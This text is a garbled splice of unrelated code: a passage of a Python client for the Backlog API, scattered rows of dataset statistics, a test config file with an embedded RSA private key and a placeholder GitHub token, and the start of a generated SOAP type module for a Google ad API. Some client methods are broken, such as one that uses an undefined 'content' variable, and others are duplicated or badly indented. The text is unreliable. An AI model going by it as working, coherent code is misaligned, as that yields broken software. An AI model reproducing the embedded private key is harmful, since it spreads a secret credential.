tuples = ["notifiedUserIds"]
params = { "apiKey": self.apikey }
data = {}
for k, v in kwargs.items():
_dicset( data, k, v, tuples )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def getPullRequestComment( self, projectIdOrKey, repoIdOrName, number,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-pull-request-comment
"""
params = { "apiKey": self.apikey }
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + "/comments" )
return self._api_return(
requests.get( url, params = params ) )
def addPullRequestComment( self, projectIdOrKey, repoIdOrName, number, content, notifiedUserIds ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-pull-request-comment
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "content", content )
_addkws( data, "notifiedUserId", notifiedUserIds )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + "/comments" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getNumberOfPullRequestComments( self, projectIdOrKey, repoIdOrName, number ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-number-of-pull-request-comments
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + "/comments/count" )
return self._api_return(
requests.get( url, params = params ) )
    def updatePullRequestComment( self, projectIdOrKey, repoIdOrName, number, commentId, content ):
        """
        https://developer.nulab-inc.com/docs/backlog/api/2/update-pull-request-comment-information
        """
        params = { "apiKey": self.apikey }
        data = { "content": content }
        url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
                             "/git/repositories/" + str(repoIdOrName) + \
                             "/pullRequests/" + str(number) + \
                             "/comments/" + str(commentId) )
        return self._api_return(
            requests.patch( url, params = params, data = data ) )
def getListOfPullRequestAttachment( self, projectIdOrKey, repoIdOrName, number ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-pull-request-attachment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + "/attachments" )
return self._api_return(
requests.get( url, params = params ) )
    def downloadPullRequestAttachment( self, projectIdOrKey, repoIdOrName, number, attachmentId,
                                       output = "path",
                                       dirpath = "." ):
        """
        https://developer.nulab-inc.com/docs/backlog/api/2/download-pull-request-attachment
        """
        # the original referenced an undefined "content" variable here; this
        # download now streams to disk like the other attachment getters above
        params = { "apiKey": self.apikey }
        url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
                             "/git/repositories/" + str(repoIdOrName) + \
                             "/pullRequests/" + str(number) + \
                             "/attachments/" + str(attachmentId) )
        return self._api_return(
            requests.get( url, params = params, stream = True ),
            output = output,
            dirpath = dirpath )
def deletePullRequestAttachments( self, projectIdOrKey, repoIdOrName, number, attachmentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-pull-request-attachments
"""
params = { "apiKey": self.apikey }
_addkw( params, "content", content )
url = self._makeurl( "/api/v2/projects/" + str(projectIdOrKey) + \
"/git/repositories/" + str(repoIdOrName) + \
"/pullRequests/" + str(number) + \
"/attachments/" + str(attachmentId) )
return self._api_return(
requests.delete( url, params = params ) )
def getWatchingList( self, userId,
order = "desc",
sort = "issuerUpdated",
count = 20,
offset = None,
resourceAlreadyRead = None,
issueIds = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-watching-list
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "sort", sort )
_addkw( params, "count", count )
_addkw( params, "offset", offset )
_addkw( params, "resourceAlreadyRead", resourceAlreadyRead )
_addkws( params, "issueIds", issueIds )
url = self._makeurl( "/api/v2/users/" + str(userId) + "/watchings" )
return self._api_return(
requests.get( url, params = params ) )
def countWatching( self, userId,
resourceAlreadyRead = None,
alreadyRead = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-watching
"""
params = { "apiKey": self.apikey }
_addkw( params, "resourceAlreadyRead", resourceAlreadyRead )
_addkw( params, "alreadyRead", alreadyRead )
url = self._makeurl( "/api/v2/users/" + str(userId) + "/watchings/count" )
return self._api_return(
requests.get( url, params = params ) )
def getWatching( self, watchingId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-watching
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/watchings/" + str(watchingId) )
return self._api_return(
requests.get( url, params = params ) )
def addWatching( self, issueIdOrKey, note = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-watching
"""
params = { "apiKey": self.apikey, "issueIdOrKey" : issueIdOrKey }
_addkw( params, "note", note )
url = self._makeurl( "/api/v2/watchings" )
return self._api_return(
requests.post( url, params = params ) )
def updateWatching( self, watchingId, note ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-watching
"""
params = { "apiKey": self.apikey }
data = { "note" : note }
url = self._makeurl( "/api/v2/watchings/" + str(watchingId) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteWatching( self, watchingId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-watching
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/watchings/" + str(watchingId) )
return self._api_return(
requests.delete( url, params = params ) )
def markWatchingAsRead( self, watchId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/mark-watching-as-read
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/watchings/" + str(watchId) + "/markAsRead" )
return self._api_return(
requests.post( url, params = params ) )
def deleteComment( self, issueIdOrKey, commentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-comment
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getListOfCommentNotifications( self, issueIdOrKey, commentId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-comment-notifications
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/comments/" + str( commentId ) + \
"/notifications" )
return self._api_return(
requests.get( url, params = params ) )
def updatePullRequestCommentInformation( self, projectIdOrKey, repoIdOrName, number, commentId, content ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-pull-request-comment-information
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/git/repositories/" + str( repoIdOrName ) + \
"/pullRequests/" + str( number ) + \
"/comments/" + str( commentId ) )
data = { "content": content }
return self._api_return(
requests.patch( url, params = params, data = data ) )
def linkSharedFilesToIssue( self, issueIdOrKey, fileIds ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/link-shared-files-to-issue
"""
params = { "apiKey": self.apikey }
data = {}
_addkws( data, "fileId", fileIds )
url = self._makeurl( "/api/v2/issues/" + str( issueIdOrKey ) + \
"/sharedFiles" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getProjectGroupList( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-group-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + "/groups" )
return self._api_return(
requests.get( url, params = params ) )
def addProjectGroup( self, projectIdOrKey, groupId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-project-group
"""
params = { "apiKey": self.apikey }
data = { "groupId": groupId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/groups" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def deleteProjectGroup( self, projectIdOrKey, groupId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-project-group
"""
params = { "apiKey": self.apikey }
data = { "groupId": groupId }
url = self._makeurl( "/api/v2/projects/" + str( projectIdOrKey ) + \
"/groups" )
return self._api_return(
requests.delete( url, params = params, data = data ) )
def getGroupIcon( self, groupId,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-group-icon
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/groups/" + str( groupId ) + "/icon" )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def getLicence( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-licence
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/space/licence" )
return self._api_return(
requests.get( url, params = params ) )
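# --- Usage sketch (illustrative only; the client class and constructor
# names below are hypothetical, standing in for this module's actual class) ---
# Assuming the enclosing class is instantiated with a space host and API key,
# the watching endpoints above compose like this:
#
#   api = BacklogClient(host="example.backlog.com", apikey="...")
#   page = api.getWatchingList(userId=12345, count=5)   # assumes a JSON list return
#   api.addWatching("PROJ-1", note="tracking this issue")
#   api.markWatchingAsRead(page[0]["id"])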
| 35.902094
| 115
| 0.526151
| 6,874
| 73,707
| 5.559354
| 0.061536
| 0.036635
| 0.068115
| 0.07887
| 0.823499
| 0.819626
| 0.807903
| 0.790161
| 0.782023
| 0.762763
| 0
| 0.006117
| 0.339045
| 73,707
| 2,052
| 116
| 35.919591
| 0.778311
| 0.138549
| 0
| 0.72887
| 0
| 0
| 0.109301
| 0.008063
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120502
| false
| 0.003347
| 0.004184
| 0.000837
| 0.248536
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f730bdfa184e875f2155e79716a3aed6b404a24c
| 1,861
|
py
|
Python
|
tests/config.py
|
armandomeeuwenoord/freight
|
31ae2fa9252ab0b25385abd04742475e6671e3b1
|
[
"Apache-2.0"
] | 562
|
2015-02-20T08:25:24.000Z
|
2021-11-12T19:58:44.000Z
|
tests/config.py
|
armandomeeuwenoord/freight
|
31ae2fa9252ab0b25385abd04742475e6671e3b1
|
[
"Apache-2.0"
] | 129
|
2015-02-20T07:41:14.000Z
|
2022-02-17T21:14:40.000Z
|
tests/config.py
|
armandomeeuwenoord/freight
|
31ae2fa9252ab0b25385abd04742475e6671e3b1
|
[
"Apache-2.0"
] | 54
|
2015-02-28T01:12:23.000Z
|
2021-03-02T11:14:52.000Z
|
SQLALCHEMY_DATABASE_URI = "postgresql:///test_freight"
LOG_LEVEL = "INFO"
WORKSPACE_ROOT = "/tmp/freight-tests"
SSH_PRIVATE_KEY = "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEArvyc+vZVxUjC5ZcFg1VN3jQOCOjO94gwQKFxlz0zOCrCz+Sq\nnWk28YdUpOU016Zinlh4ZZk2136nCKKTMnNMjd6cTTCn5fWomjR+F2CSdaYYpYfO\nNtVnq0SIDUgGmjyPncOGrxVT6EzjjSvgE8W8YIc5rVJqNMAH5OywUH0nqISYN2yP\nwbUPVf8zqu3kpnTt7YcWZ+Ye4b3jX6Fo2Xw5P1TTwQ92K9JdVAltBRpwSLtBQUYC\nMkwtNf6QIbRYKoVZuEhi/8XCxT0zG78Lsqpbld8IEnLWUGifCtx9mKqVi8Y3QTsT\nknMWFaf+Su8htgw/W7tufmrtTKNJYDtPTGiBeQIDAQABAoIBABYsC/gAnn2Q6qEM\nsbYiaOtuzRhz50WWDAckbbAsIQFM6cJNxxCK9FtGOoNqR3fLrVNDAn5dG4XSlneR\nofUShvCy9DsTnzKUHfjsDc4IfoZJtXXD720jPS+GT3bfWXbRlaD31Wj52tfkZjDN\nDmdy9puEhtpfRvXIHzfyhaStNwkzDh0jp8e8yok1mLA+3FPqkJPF6ptxPs6HEQS8\npY75jxvypbux2+W9249J/HqMmd5/+r7tt62vciqnXb2LG2AmUxLhTAQU9mGM2OSL\nrh2j+7/2apEQLdJ0DbS19IkQZRpO/DLPyhg6C29ZuNQffQWoLiZlfgIEaBT939aM\nkFdzy8ECgYEA4BdisLRCyCdm2M7fMDsV7j71z48Q1Kdl5A6/ngiK1dCwnjRMvkLx\nKOHtmvpJxHTH+JAewrrGUg0GF1YpM3gi0FQ7f9qTlAeFIrU3udV8F/m6+rIOpx92\nB2FSrYTaonLX8g4OzXKNtQcwzx91mFWTIEmfQl9let0WMrCRzReXp0sCgYEAx+dC\ncbERCVcJvs9+SUwVXXOreCF4PedLrg7bjkfYSpmAJk9c36EOi1jIGO5rat5/k7Nb\n0plWghADjtcb4r8oO6pzhMR81cESgFOk1UasP4rPYX4mEYPBwVGgN7ECUXj9XFPZ\n/tk7lgneBc1/6eV978MTprXiHU5Rv7yZBMuf68sCgYAd6YE27Rjs9rV3w0VvfrOS\ntbzCE+q/OAkVxBI32hQOLmkk9P45d14RgvbgdQBbxOrcdwBkJeJLGYnym4GsaSDc\nhiHbEyYX4FkZJO9nUuPZn3Ah/pqOHFj46zjKCK3WeVXx7YZ0ThI0U91kCGL+Do4x\nBSLJDUrSd6h6467SnY+UuQKBgGV0/AYT5h+lay7KxL+Su+04Pbi01AAnGgP3SnuF\n/0KtcZsAAJUHewhCQRxWNXKCBqICEAJtDLjqQ8QFbQPCHTtbIVIrH2ilmyxCR5Bv\nVBDT9Lj4e328L2Rcd0KMti5/h6eKb0OnIVTfIS40xE0Dys0bZyfffCl/jIIRyF/k\nsP/NAoGBAIfxtr881cDFrxahrTJ3AtGXxjJjMUW/S6+gKd7Lj9i+Uadb9vjD8Wt8\ngWrUDwXVAhD5Sxv+OCBizPF1CxXTgC3+/ophkUcy5VTcBchgQI7JrItujxUc0EvR\nCwA7/JPyO8DaUtvpodUKO27vr11G/NmXYrOohCP6VxH/Y6p5L9o4\n-----END RSA PRIVATE KEY-----"
GITHUB_TOKEN = "a" * 40
| 186.1
| 1,720
| 0.922085
| 102
| 1,861
| 16.745098
| 0.921569
| 0.017564
| 0.015222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138495
| 0.014508
| 1,861
| 9
| 1,721
| 206.777778
| 0.792803
| 0
| 0
| 0
| 0
| 0.2
| 0.939817
| 0.903815
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7533a18a1b348e933be1af446bfcb6a698ac718
| 34,794
|
py
|
Python
|
adspygoogle/dfp/zsi/v201010/NetworkService_services_types.py
|
hockeyprincess/google-api-dfp-python
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
[
"Apache-2.0"
] | null | null | null |
adspygoogle/dfp/zsi/v201010/NetworkService_services_types.py
|
hockeyprincess/google-api-dfp-python
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
[
"Apache-2.0"
] | null | null | null |
adspygoogle/dfp/zsi/v201010/NetworkService_services_types.py
|
hockeyprincess/google-api-dfp-python
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
[
"Apache-2.0"
] | null | null | null |
##################################################
# NetworkService_services_types.py
# generated by ZSI.generate.wsdl2python
##################################################
import ZSI
import ZSI.TCcompound
from ZSI.schema import LocalElementDeclaration, ElementDeclaration, TypeDefinition, GTD, GED
##############################
# targetNamespace
# https://www.google.com/apis/ads/publisher/v201010
##############################
class ns0:
targetNamespace = "https://www.google.com/apis/ads/publisher/v201010"
class ApiVersionError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ApiVersionError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.ApiVersionError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","ApiVersionError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.ApiVersionError_Def.__bases__:
bases = list(ns0.ApiVersionError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.ApiVersionError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class AuthenticationError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "AuthenticationError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.AuthenticationError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","AuthenticationError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.AuthenticationError_Def.__bases__:
bases = list(ns0.AuthenticationError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.AuthenticationError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class CommonError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "CommonError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.CommonError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","CommonError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.CommonError_Def.__bases__:
bases = list(ns0.CommonError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.CommonError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class InternalApiError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "InternalApiError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.InternalApiError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","InternalApiError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.InternalApiError_Def.__bases__:
bases = list(ns0.InternalApiError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.InternalApiError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class Network_Def(ZSI.TCcompound.ComplexType, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "Network")
def __init__(self, pname, ofwhat=(), attributes=None, extend=False, restrict=False, **kw):
ns = ns0.Network_Def.schema
TClist = [ZSI.TC.String(pname=(ns,"id"), aname="_id", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"displayName"), aname="_displayName", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"networkCode"), aname="_networkCode", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"propertyCode"), aname="_propertyCode", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"timeZone"), aname="_timeZone", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"currencyCode"), aname="_currencyCode", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"effectiveRootAdUnitId"), aname="_effectiveRootAdUnitId", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
ZSI.TCcompound.ComplexType.__init__(self, None, TClist, pname=pname, inorder=0, **kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._id = None
self._displayName = None
self._networkCode = None
self._propertyCode = None
self._timeZone = None
self._currencyCode = None
self._effectiveRootAdUnitId = None
return
Holder.__name__ = "Network_Holder"
self.pyclass = Holder
class NotNullError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "NotNullError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.NotNullError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","NotNullError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.NotNullError_Def.__bases__:
bases = list(ns0.NotNullError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.NotNullError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class ParseError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ParseError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.ParseError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","ParseError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.ParseError_Def.__bases__:
bases = list(ns0.ParseError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.ParseError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class PermissionError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "PermissionError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.PermissionError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","PermissionError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.PermissionError_Def.__bases__:
bases = list(ns0.PermissionError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.PermissionError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class QuotaError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "QuotaError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.QuotaError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","QuotaError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.QuotaError_Def.__bases__:
bases = list(ns0.QuotaError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.QuotaError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class RequiredError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "RequiredError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.RequiredError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","RequiredError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.RequiredError_Def.__bases__:
bases = list(ns0.RequiredError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.RequiredError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class ServerError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ServerError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.ServerError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","ServerError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.ServerError_Def.__bases__:
bases = list(ns0.ServerError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.ServerError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class SoapResponseHeader_Def(ZSI.TCcompound.ComplexType, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "SoapResponseHeader")
def __init__(self, pname, ofwhat=(), attributes=None, extend=False, restrict=False, **kw):
ns = ns0.SoapResponseHeader_Def.schema
TClist = [ZSI.TC.String(pname=(ns,"requestId"), aname="_requestId", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"responseTime"), aname="_responseTime", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
ZSI.TCcompound.ComplexType.__init__(self, None, TClist, pname=pname, inorder=0, **kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._requestId = None
self._responseTime = None
return
Holder.__name__ = "SoapResponseHeader_Holder"
self.pyclass = Holder
class StatementError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "StatementError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.StatementError_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","StatementError.Reason",lazy=False)(pname=(ns,"reason"), aname="_reason", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.StatementError_Def.__bases__:
bases = list(ns0.StatementError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.StatementError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class TypeError_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "TypeError")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.TypeError_Def.schema
TClist = []
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApiError_Def not in ns0.TypeError_Def.__bases__:
bases = list(ns0.TypeError_Def.__bases__)
bases.insert(0, ns0.ApiError_Def)
ns0.TypeError_Def.__bases__ = tuple(bases)
ns0.ApiError_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class SoapRequestHeader_Def(ZSI.TCcompound.ComplexType, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "SoapRequestHeader")
def __init__(self, pname, ofwhat=(), attributes=None, extend=False, restrict=False, **kw):
ns = ns0.SoapRequestHeader_Def.schema
